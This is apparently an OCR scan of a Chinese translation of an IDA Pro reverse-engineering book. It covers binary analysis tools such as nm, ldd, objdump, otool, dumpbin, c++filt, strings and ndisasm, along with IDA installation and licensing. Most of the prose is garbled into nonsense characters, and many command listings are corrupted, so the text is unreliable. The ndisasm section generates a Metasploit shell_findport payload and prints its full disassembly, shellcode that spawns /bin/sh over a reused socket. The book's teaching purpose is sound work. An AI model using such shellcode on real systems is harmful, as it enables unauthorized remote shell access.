FELLER, ARMS ATE AT LA AR BRE Be FRB ICL TALE SPT MNIA, EP BEI HR, 2.1.2 PE Tools PE Tools” 2—#FH T4367 Windows #4 PTE AS 7 ERE TAT BVT CHL PE Tools (13 FTA 2-1 AR, PT AER, PRAT CEL UPA PE Tools WIT KALA. DB p//pctoats org ulpetools btm, 40 F2E HHSAT RIA ERERAUZEP LPR ERE FEB RTIET SCE, ULATLAGEFH PE Sniffer SFT AE FL BAT SCE AT aR, CC HD RSE FT UME, Tools RARE T SPOTS HSCEI. Sb, APSE AT VAAN PE Editor FRAGA PE ESL TBR, CBT AE Vy ECTS, A, MRA CFR AT — RO PE, BBE PE ESL ARIA (obfuscation) HETHRARE AMAA, RAT TRATAA A, BM RET REBAATTAUNTA. HISHAL, BERTRAM MRA, PRY EA PEA LEEER. UF HAMHERRHARA T RAMA, AB ILAM To. AE BUT ALE UR, abet. ANAS 21 Rif wep MM Ry VACATE LAL, 2.1.3 PEID PEID* 53 —&K Windows TA, ERAT WHER —HE Windows PE — tdci GR FAROREERS, FFOR TELE (AFP SU Windows PE UEC (FHA. Hel 2-2 Bar 7 MMT EF PED AEB Gaobot 8h 21) —TE TAM LA (eB ASPack ). 22 PRD SATA PED HUF APSCLDI AES PE Tools MSREAIIR], fH Gas PRICES. WA IEE JETER. ITER RICE. 2.2 BIR APPRAISERS — ERIE SCARIEST AR, DA AERC LSPS , mE DBA huptipeia.into!. (@ HM http:/securityresponse symantec.com/security_response/writeup jsp?docid=2003-112112-1102-99. 2.2 HSER 1S SERS T ARES B. ABEL AAR RH E MEO, EE BE LEA LE RECN, FERRET EAH, Bee ACT FL HE HS PH 2.2.1 nm SEMPER DT, SPR ATA HES SEER) APS THRE, DA AEE BRPES AS ERICH LAB IUT SCPE, BEARER TES 005 | A, BRIERE As USE He RE HY AU DAT ICP PASS, UU, RERERRRL A CoH BROCE BES AE a ATIC. AE nm FARE, STARA “AE PS” 5 OL nm Ree Te RE (PS 0 PCIE, MEADS CEE) BY, BURR ee SANSA 7 EH BHC Se GE IS A nm SEPT LHR A LF BA ‘idabook# gee -c cha_exanple-c idabook# nm ch2_exanple.o U _stderrp U exit U fprinté (00000038 T get_max ‘00000000 t hidden (00000088 T main (90000000 D my initialized global (00000004 C my unitialized global U print# U rand U scanF U srand U tine ‘00000020 T usage idabook# SMP AT LAB, nm Fits TA — MESSE SHR SESE ER IE RASH, HTN PMT UEP, FE U, REL FES, ROSAS i 1, EIB LINES, Re t, EXCRETE S. ECRIFP, RMESER SAT —THSRM. D, Cpe eae. Cy ARLE ECR. 
WH ASPSATEARS, LEFEMATAMT, HRM SFT MHAF PROM Tt aE. 16 2% KHHRICBIR SURE nm PETITE PAS, SARA RTH. CRE, AE Se Meh CHOATE). Ast, et nm, HER PRES RG. FTA nm Ab FTTH AS BL dabook gee -0 ch2_example ch2_exanple.c dabook# nm ch2_exanple anaes Uexit U fprintf o80485¢0 t frane_dunny 08048644 T get_max (0804860c t hidden 08048694 T main 0804997¢ D my initialized global 08049a9¢ 8 my_unitialized global 0804980 b object.2 08049978 d p.0 U printf U rand U scant U srand U tine o804861c T usage dabook# CEP IF YASS Cn main) BeSrHe T MaMa, EASA Tees (hn frame_dummy ), 53—2e*F 5 (Mn my_unitialized_global ) MSS See Tames, FRA THS ch FR BURSbARES, THI WARE AES. PER MIE BRITT Che Ths — EE, Jai, ASE AOR SHEE CHASTE L. KI MEBAR mm HE, ABD nm Ft. 2.2.2 Idd BUBERT RATIOS, RTT RSCHES | FARE PE PRG HEL SEE SS TP PA ET RT SERRAAUTH: #42648 (static linking ) #144 4s444% (dynamic linking ), HER M STS POE LUA ERB. TABATA WBE. BREE, MOANA. GN BER RTE PAE, EERE SoHE LUBE 9 BRC UT TG ES I, AER MADUT IOS. 2, ATMA, AW EEROS ETE. ORE: A, Re UE A, AIAN HR BC BCA ET FAME TAB HERE Ae RA OT PAT ICA 5 SEP RE OS, REPRE ETT HBR Ss EHP, 9 — LE BE AY, BOP RA ET EE. AAS) TPR IE, PASE LIISA. ESTA PARE EAS , SEILER RHEE GSE HE” AL “Se aM — 4 Fa — UE” IBA. BUDGE 12 FRITH EM RAS D WT ES ALBERT, TEED John Levine HSE Linkers ae Loaders (San Francisco: Morgan Kaufinann, 2000 22 MRLR 7 ELE ET 1 TR IA. SSE SO SHHEAM, (HD SREN, ERR RRA HC REO HZ, eR HERO GHA so BRA SHE) EASA BUR RAT TSCeR, Ply, NPS LOST ATSIC ae, TIL, OUTTA SHERPA LAT, Ly SAREE PONE (BES UES), WES, RCRA R AOR, Bay PAS BIE — 15 FAB it CE, AEH AE — ae, EER SE eth BILE. 
ARLE ALITA MRO, IPRA ANTED , MOAR Mae ORB PERE DAREN — TRAE, SURE ANA BART, it EMBASE EDTA PES 5 MUR — ARETE ERE TG RESP, PEKAR KLE RPS TBR Fm HO HB TR FR as AS BT A RR EMERG, EL Baa FH $1 1¢ TARR Bi ae ICE ‘idabook# gce -0 ch2 example dynamic ch2_exanple.c idabook# gce -0 ch2_example_static ch2_exanple.c --static Adabook# 1s -1 ch2 example * Xd root wheel 6017 Sep 26 12:24 ch2_exanple_dynanic x 1 root wheel 167987 Sep 26 11:23 ch2_example_static idabook# file ch2_example_* cha_example_dynanic: ELF 32-bit (58 executable, Intel 80386, version 1 (FreeBsb), dynamically Linked (uses shared libs), not stripped ch2_exanple_static: ELF 32-bit LS8 executable, Intel 80386, version 1 (FreeBSD), statically Linked, not stripped idabookt AT UR AASRERE TEASE, BAS HEIR — UM CUTER ONE BE ICE, LA SE SCPE MATS FER. ltt, SAS ERE UL SCE ANIA, BRA TOT SS Mat — sa ET EL SUF RIRFESCHF. Idd (list dynamic dependencies ) 32—/MiAM SALA, WE ARRAIAE ara DATA ASM, AEF ERE TITHE, FRITH 1dd WARE Apache Web HRI-FEDT RUF. Adabook# Idd /usr/local/sbin/httpd Jusr/ocal/sbin/ht tpd: Libm, 50.4 => /1ib/Libm.so.4 (0x280c5000) Libaprutil-1.50.2 => /usr/local/1ib/Libaprutil-1.s0.2 (ox2Bodbo00) Libexpat.so.6 => /usr/local/1ib/Libexpat.so.6 (0x280ef000) Libiconv.s0.3 => /usx/local/1ib/ibiconv.so.3_ (0x2810d000) Libapr-1.50.2 =» /usr/local/1ib/libapr-1.so.2 (0x281F2000) Liberypt.so.3 => /Lib/Libcrypt.so.3, (0x28214000) Libpthread.so.2 => /1ib/Libpthread.so.2 (0x28232000) Libc.s0.6 =» /1ib/1ibe.s0.6 (0x28257000) idabookit Linux Al BSD & S¢H4i#etst Idd TL. 4E OS X ABEL. (EFA otool CSL, 347 b-L #3 ooo) -L SHA), WTS AE. #e Windows ALCH, ATLA Visual Studio TAZEP EP MSL 18 #2 RHSRIMIR “LR dumpb in FARCE, FZ2C: dumpbin /dependents X44» 2.2.3 objdump 5-2 FRI dd AIA), objdump SHAE SH. Bm BRA KAN BE objdump AY SHBG. TAY BE AY BR, ob jdump LAE T A Mh S47 HE (aL 30+), LAER BRAHMS AME EL objdump TH PRR SARK A RAR (URI ee A). 
OFS AB, BP SCE HEA O SRAM, BRAM, & UPAR OR, HERE TE 0 FSR, DEI nm ATCA SRA O BUCHER, objdump MICH PICA URSA TREE Ho BULB x86 ASAT, objdump PT LAME AT&T BR Intel HE, IF MT LAE RITA RHR TE TE SCAR ICES BORE ARCOM ISIE RGA (dead listing ), EKA SCH A AF Seat tT FR, LEVER, IC BR HI objdump 4 GNU binutils” Ae H—264}, AU PTLAZE Linux, FreeBSD #1 Windows (ii at Cygwin) ABE PRB TA. objdump Het — FES AHRR AEE libbéd ( — abl TAA AE) RVI ERIC, Fuk, CHeReAROT libbid SARIS (ELF. PE). Sb, 2K readel f MSC FATLAAL ET ALPARET ELF H+. readelt YASIR objdump HA, EAT ZIBLAY SEBS SEF readel f IF AHO libbid. 2.2.4 otool otoo) BI FFM STS OS X Mach-O SiS AAS. Alt, AT fe URE SCE OS X SEF MILF ob jdump MIST TA, FmHA T SIeT8EH oto) Sh—> Mach-O — iit WM APERBLCR , IMTTRUTAMLF 1ad HHH. ‘idabook# file osx_example osx_example: Mach-0 executable ppc idabook# otool -L osx_exanple osx_example: Just/ib/Libstdcr+.6.dylib (compatibility version 7.0.0, current version 7.4.0) Zusr/1ib/Libgce_s.1.dylib (compatibility version 1.0.0, current version 1.0.0) Just/1ib/LibSysten.8.dylib (compatibility version 1.0.0, current version 88.1.5) otoo) AUT F BAR SIEM SABA S REA OAR, MICU La. TRELHK otool WMMAR, ASMHKF A. TAL DART Aa Ee, fH od AE D BI hap://vww.gnu.org/sofware/bimutls/. 22 #&IR 19 2.2.5 dumpbin dunpbin ff Visual Studio TAZEHEH i —Mir fT SH LH. “5 otoo! Al objdump FF, dunpbin BT LAB AR ACHES Windows PE X47 2018. Fie BF BLA T AUTH dumpbin Lie ALF dd BDF sR EBA Windows 11H SPRY MBAR. $ dumpbin /dependents calc.exe Microsoft (R) COFF/PE Dunper Version 8.00, 50727.762 Copyright (C) Microsoft Corporation. All rights reserved. Dunp of file calc.exe File Type: EXECUTABLE IMAGE Image has the following dependencies: SHELL32-d11 msvert.dL1 ‘ADVAPI32.dLL KERNEL32 411 132.411 USER32.d11 dumpbin AO SUfbETTA A PE Eta SCE RSET, SLITS. SRA BURR. 1, BOR BCA HUBLI ARES KT AEA KOA FAD dumpbin A942, EVITA Mirerosoft Developer Network (MSDN ) °. 2.2.6 cHfilt HF OLS RO Ak, Bi, SCR OR CR ROT aT — FADS, LARS TRS BS. 
FIR CH SBA T7829 demo MRR BCAH IL. A RRA: Void dena(void); void demo(int x); void demo(double x); void deno(int x, double y); void deno(double x, int y); void deno(char* str); 5, TRAPATT A RAL, SER, SHEARS BS ARYA HPL RBS RA AP, SAT Dy ARICA Ef AAS IRE A Bee DME PRE (LS ALM (name mangling) °. MUSCAT nm FEHR NTTATED CoS @ 42 tmpy/msdn microsoft. conven-usibraryth23y6e(VS.71) aspx. QAKAIASPER, HS hup./en wikipedia org/wikiName_ mangling. 20. #2% BOSATAIA BRERA PHATE, HERON FSR (CAM, DIZEHH SEAS demo AUR RARA ): idabook# g++ -0 cpp_test cpp_test.cpp idabook# nm cpp_test | grep demo 0804843c T _ZadenoPc 08048400 T _Zadenod 08048428 T _Zademodi 0804834 T _Zédenoi 08048414 T “Z4denoid 0804834 T _Zadenov CHEER % PRAT HSE BRE, A, PBT ATC RE. TE SRL AY demo PARR TAR, BRAT RE (HON gH) 4 Re BROLA, cofilt ERRATA. cHfilt MAA MS PA RRS 19% BE (mangled name ), IFUL WUE DFARS PRR. LURKER EP AMARA ES, BBA, coi t RRB AZ AEN I ks WR Cred t RTE TS Bs, IB EEE ML RAK HORE EAT rm SAU AIRES coe Pit AE, PET DB ee RA BR, AI Ta dabook# nm cpp_test | grep deno | c++filt (0804843¢ T demo(char*) (08048400 T demo(double) 08048428 T demo(double, int) 080483fa T dewo( int) 08048414 T demo(int, double) 0804834 T demo() (APE, ee BROT ARS FS A RA. TTL, om Fete SHE Gk. FED LR, TREE, EARNED, BME HT AE MASKS RBA EA RE 23 RERWIAR BIBL, RNEBHET ALA, ARE LA, ALE AMS BARRE AEA TAR SPT, ELT DEBRA TESA SZ BACH EE BH FER WH, BUTE ES AT ERE PI ETA 2.3.1 strings FART, BES EAE A LET, BAR ANS BE TEC ee BT FB A A] Si, WRATH, BLN: “LSS? ORR, TERI ZH. aT FeV — AV: “BURA ERE?” ERATE EA PRG PL els FT EE REE 23 RRRMIR 21 PRA. HH, HA — ELL, BRET KRA—MeEM SAR. Blt, TYLER 4 MESEATIT A) ASCH FEAR, SPHERE A ITED OK, HL, 1 RARER LEE TR, GE BLP BCP SRE UR TERK Word SCY PERRET E, strings SMT AGF RRP THEA, MH, KARTARS SAH AMR. BUH strings MRURE (Bas 47H 71 ASCHIFA ), WBE HR. 
idabook# strings ch2_example
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
exit
srand
puts
time
printf
stderr
fwrite
scanf
__libc_start_main
GLIBC_2.0
PTRh
tl
usage: ch2_example [max]
A simple guessing game!
Please guess a number between 1 and %d.
Invalid input, quitting!
Congratulations, you got it in %d attempt(s)!
Sorry too low, please try again
Sorry too high, please try again

AE, RNR, EARP, ES RRS RUE ZT. At, POA REIL OURIE EST RTE FRE. TARAS ARROF, HEE strings ASH JEWEL WOE. FREE: SU PSR EER, PRAISE FORA TEE FRE strings Mt RSM, O AH, FEAF strings AE PTATICA, BRATASL TF, strings MOSH FAR, OS. GEM OAT SMa ALBA strings FE TICE O strings REHM PAPE PAA. QM OTS Rt AS strings BARB FEE BO O FEET HEME, MRSS Ec WE strings PRE EOE, 0 16 1% Unicode F¥¥ 0 2 2% KRHHRCBIA

23.2 Ril

OTST AAR, AAAS TAA T LE AE BRC EA A RIT. PE, ELF fl MACH-O 5¢/F8] 435M dumpbin, objdump #1 otool BET RILM. (EE, EAR AU EELAT ABFA ERAS SS UE ER. ALAR, HA PSB) RFE ASCP FHSCIE, AEROS TF, ORB AG SE — SORE AT Pe BT A BT FUBININF x86 F842 SEN A A ILM & ( stream disassembler ): ndisasm #1 diStorm (1), ndisasm H& Netwide Assembler (NASM ) (2) 7t1f4)—4- TAL. FTAA BF BEAA T aOrfar GE) ndisasm BALA — Bit Metasploit (3) 3274 Ly shellcode:

idabook# ./msfpayload linux/x86/shell_findport CPORT=4444 R > fs
idabook# ls -l fs
-rw-r--r-- 1 ida ida 62 Dec 11 15:49 fs
idabook# ndisasm -u fs
00000000  31D2              xor edx,edx
00000002  52                push edx
00000003  89E5              mov ebp,esp
00000005  6A07              push byte +0x7
00000007  5B                pop ebx
00000008  6A10              push byte +0x10
0000000A  54                push esp
0000000B  55                push ebp
0000000C  52                push edx
0000000D  89E1              mov ecx,esp
0000000F  FF01              inc dword [ecx]
00000011  6A66              push byte +0x66
00000013  58                pop eax
00000014  CD80              int 0x80
00000016  66817D02115C      cmp word [ebp+0x2],0x5c11
0000001C  75F1              jnz 0xf
0000001E  5B                pop ebx
0000001F  6A02              push byte +0x2
00000021  59                pop ecx
00000022  B03F              mov al,0x3f
00000024  CD80              int 0x80
00000026  49                dec ecx
00000027  79F9              jns 0x22
00000029  52                push edx
0000002A  682F2F7368        push dword 0x68732f2f
0000002F  682F62696E        push dword 0x6e69622f
00000034  89E3              mov ebx,esp
00000036  52                push edx
00000037  53                push ebx
00000038  89E1              mov ecx,esp
0000003A  B00B              mov al,0xb
0000003C  CD80              int 0x80

(1) http://www.ragestorm.net/distorm/
(2) http://nasm.sourceforge.net/
(3) http://www.metasploit.com/

EPR CROCE UE, BUC AS. Glin, Zeca RR aT RE shellcode HTS ULM BCE Mt, BEAT FAMILAR iz Lt 28 9K BAL aR A440. shellcode HORE Bhs VASA REAR . Ah — ARAL IRAE 8 ABB ROM AR. ROM "PF PETER FARSI US, AT SERRE LRRD RE.

24 Ia

ACRE TT ICH TR — ED PET 8, TERE “EAE ECE TT ARMHOLA. WR AE, BOT AAAEEET IDA RFR. TE TRALEE, BR AVERT AL, SORE TLD yp TARR IDA BAF PALA Be a BSE TE Se HE BEBO . IDA Pro AIR Bip BARICM ILM (Interactive Disassembler Professional ), Ai] #4 IDA Pro, BK SZ (GARY IDA, FEAF CAI TH (Lidge ) AY Hex-Rays?Z> a HBF iho FR IDA HBBRA KM Mfak Guilfanov, ATH fe Mak. +S4E MEAT, IDA BE —TE Feil Gi) MS-DOS WAY, Xk — AUR, Ay EBT IDA AP IA BRHUWPYA Sb, IDA (hE GUI RAAT REDTAT IDA SREY Se AiO, Jt Ee RD DOS hit eRe & ERA fl 6 ILA MTA, IDA ABI FRI RS. TIE, OTHER FR, IDA BORAT TERA , RATT RIE 8 T FE ARENA F ERI — TAA IDA, RUA ABUG RRR DARL TERIA PEE PIMC BRR ES, IDA FE PRES RBNRN, BEOAR RUE AA, Beeiste IDA PHAR ABA 1S, (2 DA WER ARLES, BAVA ARR. HOt, IDA AIEEE FORA, TH ELBA URE OS ARIS POR CT ARTE RE ICR. BEE RR SEAHEC CRB >, HEAL RESIN TL PREG E S Bt. 3.1 Hex-Rays 23 3) A 2 ZAR SBR IDA FAP T LAF URS. IDA Hex-Rays AAA i.
A, HD FARR BURG IDA IWOOT, PAA, BERR IDA MA SS RRO HRMBRAR. Wik, IDA MHRATAA DataRescue HEHMARA MATE EM “BLE 2” (Hall of Shame), AFT HREML, IDA RA TLE, HSH TERY AA FAP REE TMS — RARE: 4 —t IDA ABA RED, LE WO — 8h — HE MUR— GF IDA HEUTE HH RP, Hex-Rays SURE LK ALARA, IIA PBA. RTH AAT LIE Hex-Rays ft) IDA CHES FSV IDA HY “HER” RAR MTTIE D BAEK, A—Fitk DataRescue 2 MYA. LAL 2008-4 1 HA, Make FFG TE A CA) Hex Rays HE ALE DA, @ HWACHFAOE FE Windows, Linmux #1 OSX, De UE” CAME RL Hex Rays HREM: bttp://www hex-rays.com/idaprofhallofshame html. 3.2 _HRIDAPro 25 OSC HFEAT EMS, IDA RIM A — AOR Pe TA IDA BK. iM, Windows KiAAY IDA ASG, Ete 23945 HRT UDP, JERE, FET SpA HA ADA aD ERY IDA SCOIZEIE 1. YANG, IDA SoHHG SRM TRC SOFA BUETT TERT AR, MUR OR PASAY IDA SH, IDA Siiaeetah. 1H BLE, PALE AHL LES IDA SH. IDA SoHE AT SRR RE AE, UR ECS — BRA SPIRO » TEA AN, IDA SAB — MARY ida key CFF o MUR TREATS, IDA RELA SCRAP AE PE IDA IBERE. MEARE, ida key SCPPRREALP GE, FEE TERRA TRE, FAP UAE To 3.2 3RRRIDA Pro SG, RELBEN EE, IDA IPIER IRAE MORAL, Hex-Rays 9 AT BARE IDA HSPLVE. Rat, Hex-Rays HAH TM IDA BATAEOUA RET — A RNR READ, (EE, BERATED AIO DIRE . BERL RRNEAS I IDA 5.0 (-4RITEAR I 6.1.) HATED FEIE, BATHETEMER A PUPS MERA. PR STRNASE, Hex-Rays SHE CEM TTA DURE FURAN. AURELIO] LARA IRN F IDA PIRI AE LAST IDA, WA, EMOREAU, HABE TAR IDA HGR ATH He BALE) ANA HRD, PRAISE — Pho 3.2.1 IDARRA JABIAR 6.0 FFE, IDA BILLZE Windows, Linux #l OS X B) GUI ALM GFT PERF. IDA FF Qt BPE A GUI EE LR =F ERE BP. REL, IDA Pro Jt RAUNT NTA, TARA AE, AEP ETS TR Fil, PURE PATTI HAE, RUA BEE RMN SPAR BA HOS Hy 540 TE ) SF 30 SALA, TEAL CAH LP REN AE ) USF 50 AoA EA URE RAHY ELIR x64, AMD64, MIPS. PPC Ail SPARC 3.2.2 IDAFFATIE ZEHISE IDA HY, FP ALG HEAT IE, Hex-Rays PUMSR: “Ba VETUE (named license) S—-HEMRAH PAK, AIST MERE HALE. MTEL EAT EIA 3 — a SRE LAK, PEAT POLO FL Pe A A HE, AUC (D #18. nepy/wvwoihex-rays.com/daprovidadownfreeware htm. @ #10 bep:/wwwhex-rays.comv/idaprofidadowndemo htm. 
@ #12 bepyivwwhex rays.comldapro/idaproc htm. @ 85 hip //wwwhex-rays.com/idaprovidaorderhtm 26 #3 IDAPro HMR ABA OTE.” HERR. BUR A PAT ET EERE OL EERE IDA FE, (AR AoA eT IDA SHE. TAL, APA, RAZ, IDA AAETE SUR FTAA bietT. BAA HFS AREA TE TIEAE, IDA MiP TIE KT TAP xt IDA HT C9 HARA. 3.2.3 MSE IDA FEMA 6.0 ZT, FAP WIAY IDA fati—* Windows GUI MASA Windows, Linux #1 OS X HUFEM ATH. DARRAS 6.0 FRA, MOSK RAL FUATE SE ALATA ie TT IDA RESCH AP IDA 6.x (BUA LH PES EEE RES BALE Qi) GUI ARAL. WIR ALP RE BEMIS RT AFRESH ATE, Hex-Rays HAT OPER. JUST ATLA IDA SUES PO LB ER GHAR EME IDA, SABAH a FARE] Hex-Rays WE. MRI, A ATR Pan CAR FBSA, IELTS AEBS ET hh AT DR PR IDA RARE SE, 7 HAJEAL PIRES IDA SDK VARIES TAL. HS. PEFR FRAT SSE IDA HO RRR IDA O23, HARB PBA PE HLL, Hex-Rays HUE IDA 26% BAAS RERTEOR HF IDA ASE BRA TEAS EE Pal AE RY FER DAERAH, CERMA ORES, JHE SRA RICE ERS. 3.2.4 FRIDA IDAHelp ( 7511) SEAL — TAFE ARE, UES, IDA SHE SISCE RT AA SU, Seas IDA BOR. RRP, TERE, J Bile] Hex-Rays 2E ida key (Fo Pa, Hex-Rays SMEAR, IRCA AA BOTEANE. WR ERRURI IDA RAR, BEAR, ANCA ALA ex-Rays yea BOF PREGA DTINTT OS. BS FORA SARE BA, RA PT REA RAR PRR, FATE AIDA, WB, FRAN EASE IDA BEAN IDA RR, BREAN AR EE I — hee FSR, DRE EF EBC FETT A ECT I TLRS BL FETA, RT RE SE A BASIN. AR, ARR Bah, RRC I RO TL AEX IDA Hi 1 HES 17 ET MET IT TEI. D0 3.3 IDA XHRR fE2—% IDA HEP, PROT REARI, IUSRGSIS IDA ASEAN, WOME Me SPOR MB 34 RIDA 27 SUR RATAAEE ATR, ATH ROBERT BY A eA, RG BERS A , REST Hee OE. ERA ENC. IDA MOSHE T SEA HY ( menu-activated ) HALE, AE, RXR IDA AAA AAT RA, ERT aRATT HF IDASDK VA BIR RRA FRANTIC H O Hex-Rays MAH DMA. Hex-Rays ATH—-TRAL IM”, HAAS IDA AKIN DERIVE, LEED AE debi. JAP SRB, Ufak Fl Hex-Rays AN SURRODEDY RAUL RAC, RASTER. FAS AY LS Hee SDK AUTRE, AER, ASAE Bey IDA AR TRE CHAR AA ZARB DD. FARUMAMERT SDK SA, MIRAE “DUBE IC”. (A, WIE IDA Ah, SPARES SDK Pr imMVTESR I. ALL, Hex-Rays HRT —MPE RR, AF BEBE 10.000 FETE (FEELHY, 10 000 28TE ). 
BET AE SDK, Steve Micallef H3#4F IDA Plug-in Writing in C/C+49 278A AE Q openRCE.org. http://www.openrce.org 2-H RN MLR, Mee Ae IDA BEAR SCRE, PAR —ESSER ALPS. 5 Hex-Rays POSH Lb MIRAI, openRCE.org twhs| THESE A IDA AS, A Ee b Se scm. SR {PRE TE DD ORE EAL IDA BY BTA O RCE itiz. MURS (RCE) YES (httpy/www.woodmann.com/) 4% AHS 6H IDA Pro i XMM. AACA BART IZ, FEAR RMA IDA Pro, TT ALR TP toe CEA TLL AS D IDA Palace. MAMET IDA Palace? HATE LIEARUART, (LE, EMRE TET PEGE IDA HIGHER. FEAT L, Dilebar AT AAR BAT eT IDA B93C RNR, WRAPPER IDA REM A. O Mak aot. Mfak HG LAT SANNA IDA FRAICHE, AL eT 1B, RR ERASE I, Hob, Fefth Hex-Rays AIBA iF TRANS AHERN IDA SIRE, WIE MAE 3.4 BR IDA JABAL IDA JER ORE Pa, FERS IDA TE, EAB), EPA ABA utilities Al sdk MAR, HPA SVES ANTAL A Al IDA BF EE CREE ® S42 bupy/www.hex-rays.convidaprofidasupport htm, ® BL hup://www.binarypool.convidapluginwriting/idapw.pdf. @ BA bitp:/oldidapalace.nev/. © BL btpstorwwnexbiog com 28 $3¥ IAP HEIR FERAL HITE). PERERA, CHER BM SHE. RF Windows JAP, TAP ESC eS Windows 2 RF ARTE. WF Linux Bl OS X JAP, BEER THESE TH gzip RABI tar SCH 3.4.1 Windows #23 4E Windows RY LAE IDA AEA RIAL. IDA) Windows SARE AF AG Se GAGE HEAT aS, MRC PRT IDA, BAM T TaMEE. Jah IDA MH Windows ERG, RBH. HOP RARE RE. MO 3-1 BAR, ORAL LAE EP SE IDA PYRE AR, MES FRR AR. IR ORE PRA EEE AR, UE ETULRRA Re, ADRS, RATHU/procs/pe. 1x 3.4.4 324% IDA 5 64 {IDA IDA BARAT HY RES, ST IDA BRATION idag.exe 45 idag64.exe, WH idaq 45 idag64. MIA ARAZ IK SIZEF : idax64 BEES HE 64 AUS, it SAT IDA FBT FAS 32 (AC. Att, 4E 64 ARS bie FT IDA IAL EE BOAR IDA BT Fi TEATS PTT FAVE 32 CNA. Bala, WR 64 te Linux FL aS IDAPython Lie eS WASH, GRRE 32 WNAREY Python, ARE AA 32 145 64 IEEE, TRE BARRE RBI. 30, #3 WAP HHA 3.4.5 IDA BRA FETT RAE IDA ZA, (RAR SEAS RARE IDA 22% A RATS. (A, BER BUTTE ee WA, REA TR PRA RRA. EABMIR, THA IDA ASR RINA, BAAS, THF IDA AR RAMEE ER, PRT IDA dhe Pid + F Bak CT Windows A! 
Linux FE", BET A ae TF s X¢F OS X AF, x#6F BRA fi F/idag.app/Contents/MacOS F ). O cfg. cfg H ROSS MRLEICAE, OHA IDA AOBESCEE ida.chg. GUI BEI FF idagui.ctg PAB SCABESCHL PUR TRING EE ICHE idatui.cfg. BATHE 11 FESTA IDA H— YES EEA ACHR. O ide. ide ARS IDA HABIT IDC STRODE. FATHETESS 15 EAST total FA IDC SBA O ids. ids BS oe SCP CIDA TERE RAY IDS 4+), BARS T H AT B BD IDA WIPES ERE A. He IDs MPa. ST HP EE 09 TA SR ETT AR IR A GB BEA fA. SOE COURT) RSMAS O loaders. loaders BRAS CE Ct MRL AF EAA AT PE BR ELF SC ACHR IDA SRR. RATE TERS 18 REMIT HE IDA TARA. Q plugins. plugins BRA ST 1h IDA BER NNRE ( SHOE F eX ) MY IDA BE Bo RATAER 17 RATE IDA HE OD procs. procs HARA AY IDA MAT LPM MARR. KEM RERER A IDA HE PLGA ACARI ONE, HARA ATE IDA FPR ICRA. BATE FS 19 REMIT IDA AEE BCR. O sig, sig BRA IDA 724 HRC Hb Al ES, 2 TENDER, IDA REPS Oe A EAU RES. ATT COTM, BMA Gh IDA BEE RASHES AVE EEA” (FLIRT ) AEB, KAA TESS 12 EES. O til, til ADA, IDA SK HA REE TA a OAS. FRATHETET 13 HREM SY MAO fel
